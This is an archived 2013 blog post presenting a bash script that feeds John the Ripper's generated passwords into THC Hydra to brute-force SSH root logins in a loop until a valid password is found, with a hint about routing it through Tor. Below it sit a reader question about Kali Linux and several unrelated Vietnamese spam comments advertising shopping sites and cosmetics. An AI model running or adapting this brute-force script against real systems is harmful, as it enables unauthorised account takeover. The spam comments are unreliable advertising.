Friday, June 21, 2013
I hate downloading WordLists
1. Introduction
You most definetly know of THC Hydra ... well i love the tool problem is ...Hydra don’t digest huge lists of passwords. The reason is that Hydra will first try to load your password file into memory (RAM) before start the brute-force attack. And so, you are limited by your memory size plus i hate downloading the darn wordlists or dictionaries well why... takes to much time changes every now and then... and my internet speed sometimes sucks and the bundles lord the bundles.....so here is my tune up.... why dont we use two tools
HYDRA and John The Ripper
It’s OK with an usual password dictionary, but you could want more. Something like passwords list generated by “John the ripper” (John provides greats way to generate passwords: digit/alpha/special chars only, “rules” options, “external” filters, etc.)
Our goal is to use the output of John the ripper with Hydra.
The method is trivial but does the job.
loop
(1) Generate random passwords with John the Ripper in a file durring few seconds (file grow up very quickly).
Keep a john's session file.
(2) Run hydra with the passwords file.
(3) If found, exit. if not, continue the session created in (1).
end loop
2. The script
This is the bash script I wrote to perform the task.
· Review ‘hydra_*‘ variables (if need run ‘hydra –help’). See: ‘hydra_host‘, ‘hydra_port‘, ‘hydra_module‘, … and maybe ‘hydra_all_params‘.
· Review ‘john_*‘ variables. See: ‘john_all_params‘ and choose your template : (–incremental:All, –incremental:Digits , –incremental:Alpha , –single, –rules …) see john.conf file to get the list.
Enjoy!
Get hydra-john.sh
#!/bin/sh
hydra="/usr/local/bin/hydra"
john="/usr/bin/john"
hydra_module="ssh2"
hydra_host="127.0.0.1"
hydra_port="22"
hydra_nb_task="10"
hydra_all_params="-f -s $hydra_port -t $hydra_nb_task -e ns "
john_sessionfile="$1"
john_all_params="--incremental:Alpha --stdout"
john_time_step=20 # time (seconds) to run john
tmp_passwd="/tmp/pwd1234.tmp"
hydra_logfile="/tmp/hydralog"
if [ "$1" = "" ];then
echo "Usage: $0 <john session file>"
exit 0
fi
#for lfile in `ls $loginfiles*`;do
while [ 1 ];do
# generate some password with john the ripper
echo; echo "- Start (re)generating passwords with John"
if [ -e "$john_sessionfile.rec" ];then
# if session exist, restore it
$john --restore=$john_sessionfile > $tmp_passwd &
else
# if session not exist yet, create it
$john $john_all_params --session=$john_sessionfile > $tmp_passwd &
fi
# wait 100 seconds, then kill john and start hydra on it
echo "- Wait ..."
sleep $john_time_step
echo "- Kill john"
killall john 2>/dev/null 1>/dev/null
sleep 1
# start hydra
echo; echo "- Start hydra"; echo
rm -f $hydra_logfile
echo "$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile"
$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile
# if a valid pair has been found, stop the loop
if [ "`grep $hydra_module $hydra_logfile | grep -v DATA`" != "" ];then
echo; echo "FOUND !!"
grep $hydra_module $hydra_logfile | grep -v DATA
exit 0
fi
done
happy hunting ... oops learning .... p.s to check out this trick with a proxy(tor) check this site...am here fuu
ARCHIVED
:) No longer posting, all articles should be treated as archived and outdated
-
BTS------------Base Transiever Station GSM-----------Global System for Mobile Communications, originally Group Spécial Mobile OsmocomBB---...
-
Requirements: OsmocomBB compatible phone (Motorola c113/115/118/123) CP2102 cable (can be found here ) TyphonOS (read this is you ha...
2 comments:
how i can do it in kali linux
Theo Bloomberg, eBay đã tiết lộ tổng số tiền mà người mua sắm chi tiêu trên nền tảng của mình đạt gần 90 tỉ USD trong năm 2018. Amazon thì không tiết lộ những con số này, vì vậy các công ty độc lập như EMarketer phải thực hiện quá trình ước tính.
Tham khảo: mua hàng trên ebay có tốt không - cách mua hàng trên Amazon Nhật Bản
Folio®, sản phẩm chăm sóc sức khỏe cho mẹ và bố sung các vi chất cần thiết cho sự phát triển của thai nhi, được sản xuất bởi Hãng dược phẩm SteriPharm GmbH & Co. KG, Cộng hòa Liên Bang Đức đã chính thức có mặt tại Việt Nam.
Tìm hiểu thêm về: các hãng mỹ phẩm nổi tiếng của đức
Caryophy đã phát triển khoảng 10 năm ở Hàn Quốc, tuy nhiên, còn khá mới mẻ tại Việt Nam. Thương hiệu mới ra mắt 3 sản phẩm cơ bản là sữa rửa mặt, toner và serum trị mụn; nổi bật bởi khả năng chuyên trị làn da mụn và thâm.
Tinh chất trị mụn và giảm thâm Caryophy Portulaca Ampoule được xem là "át chủ bài" của thương hiệu. Sản phẩm được chiết xuất từ rau má có tác dụng giải độc, chữa lành vết thương; chiết xuất rau sam giúp trị mụn, ngăn ngừa lão hóa. Bên cạnh đó là tinh chất từ lá nhân trần giúp trị mụn nhọt, viêm da, kích ứng, giải độc và cung cấp độ ẩm cho da.
Tham khảo: dịch vụ mua hộ hàng hàn quốc - các trang web mua hàng online hàn quốc
Post a Comment